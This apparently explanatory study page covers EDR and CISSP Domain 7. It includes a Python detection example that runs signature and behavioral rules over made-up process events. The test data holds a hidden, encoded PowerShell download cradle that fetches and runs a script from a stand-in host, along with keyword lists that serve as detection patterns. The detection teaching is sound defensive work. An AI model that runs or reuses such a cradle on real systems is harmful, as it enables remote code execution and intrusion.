Endpoint Detection and Response (EDR) agents continuously monitor activity on endpoints, recording process creation (including parent-child relationships and command lines), file system changes, network connections, and registry modifications. When suspicious behavior occurs, the EDR platform raises an alert and gives analysts the recorded telemetry needed to reconstruct what happened and contain the threat, typically with response actions such as isolating the host from the network, killing a process, or quarantining a file.
Traditional antivirus relied on signature matching (file hashes or byte patterns) to identify known malware, so a new or repacked sample with no signature was missed. EDR takes a behavioral approach, flagging activity that looks like an attack, for example a Word document spawning PowerShell with an encoded command, even when the binary involved has never been seen before. The trade-off is that behavioral rules fire on unusual but legitimate activity as well, so they need tuning and analyst triage.
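The contrast between signature and behavioral detection, as an added example that is not from the original page or any EDR vendor: a small rule engine run over constructed process-creation events shaped loosely like Sysmon Event ID 1. The hashes, host names, field names and events are all made up for illustration; the one hash-based rule catches only the sample already on its list, while the two behavioral rules catch the Office-to-PowerShell chain and the decoded download cradle regardless of hash. The last function serializes alerts as JSON lines, the form most SIEM pipelines ingest.

```python
import base64
import binascii
import json
import re
from dataclasses import asdict, dataclass
from typing import Dict, List, Optional

# Constructed sample: a PowerShell download cradle as an attacker would pass it
# via -EncodedCommand (UTF-16LE text, then base64). example.invalid is a reserved name.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED_CRADLE = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

# Constructed process-creation telemetry (field names assumed, modelled on Sysmon Event ID 1).
# Hashes are placeholders; only "0d0d0d0d" appears in the signature list below.
SAMPLE_EVENTS: List[Dict] = [
    {"host": "ws01", "pid": 4120, "image": "winword.exe", "parent_image": "explorer.exe",
     "cmdline": "winword.exe /n invoice.docm", "sha256": "aaaa1111"},
    {"host": "ws01", "pid": 4188, "image": "powershell.exe", "parent_image": "winword.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED_CRADLE}", "sha256": "bbbb2222"},
    {"host": "ws01", "pid": 4201, "image": "powershell.exe", "parent_image": "explorer.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
     "sha256": "bbbb2222"},
    {"host": "ws02", "pid": 512, "image": "updater.exe", "parent_image": "explorer.exe",
     "cmdline": "updater.exe --silent", "sha256": "0d0d0d0d"},
    {"host": "ws02", "pid": 530, "image": "chrome.exe", "parent_image": "explorer.exe",
     "cmdline": "chrome.exe", "sha256": "cccc3333"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
KNOWN_BAD_SHA256 = {"0d0d0d0d"}  # constructed "signature" list
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-expression", "iex ",
                  "net.webclient", "frombase64string")

# Matches -e, -ec, -enc and -EncodedCommand followed by a base64 blob; the required
# whitespace after the flag keeps it from matching -ExecutionPolicy.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")


@dataclass
class Alert:
    rule: str
    severity: str
    host: str
    pid: int
    detail: str


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except binascii.Error:
        return None
    return raw.decode("utf-16-le", errors="replace")


def evaluate(event: Dict) -> List[Alert]:
    """Apply one signature rule and two behavioral rules to a single process-creation event."""
    alerts: List[Alert] = []
    image = event["image"].lower()
    parent = event["parent_image"].lower()
    # Signature-style check: only catches hashes already on the list.
    if event["sha256"] in KNOWN_BAD_SHA256:
        alerts.append(Alert("known_malware_hash", "high", event["host"], event["pid"], event["sha256"]))
    # Behavioral rule 1: an Office application launching a script host is a classic macro-dropper chain.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        alerts.append(Alert("office_spawns_script_host", "high", event["host"], event["pid"],
                            f"{parent} -> {image}"))
    # Behavioral rule 2: decode -EncodedCommand and look for download-cradle markers in the plaintext.
    if image == "powershell.exe":
        decoded = decode_encoded_command(event["cmdline"])
        if decoded is not None:
            lowered = decoded.lower()
            severity = "high" if any(mk in lowered for mk in CRADLE_MARKERS) else "medium"
            alerts.append(Alert("encoded_powershell", severity, event["host"], event["pid"], decoded[:120]))
    return alerts


def detect(events: List[Dict]) -> List[Alert]:
    """Run every rule over every event, preserving event order."""
    return [alert for event in events for alert in evaluate(event)]


def to_siem_records(alerts: List[Alert]) -> List[str]:
    """Serialize alerts as JSON lines for forwarding to a SIEM."""
    return [json.dumps(asdict(alert), sort_keys=True) for alert in alerts]


if __name__ == "__main__":
    for line in to_siem_records(detect(SAMPLE_EVENTS)):
        print(line)
```

Note that the PowerShell process in the third event runs a script with `-ExecutionPolicy Bypass` from a normal parent and carries the same hash as the malicious one; neither rule fires on it, which is the point of keying on behavior rather than on the binary. Real EDR rules add context (signed-image checks, user, prevalence across the fleet) to keep that kind of administrative use from drowning the queue.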
CISSP Relevance
EDR supports Domain 7 (Security Operations) monitoring and incident response capabilities. CISSP candidates must understand how endpoint monitoring integrates with SIEM platforms (EDR alerts and telemetry are forwarded so they can be correlated with network, identity, and other log sources) and how the timeline of process, file, network, and registry activity that EDR records supports both detection and forensic investigation after an incident.
External reference: CISA Endpoint Security Guide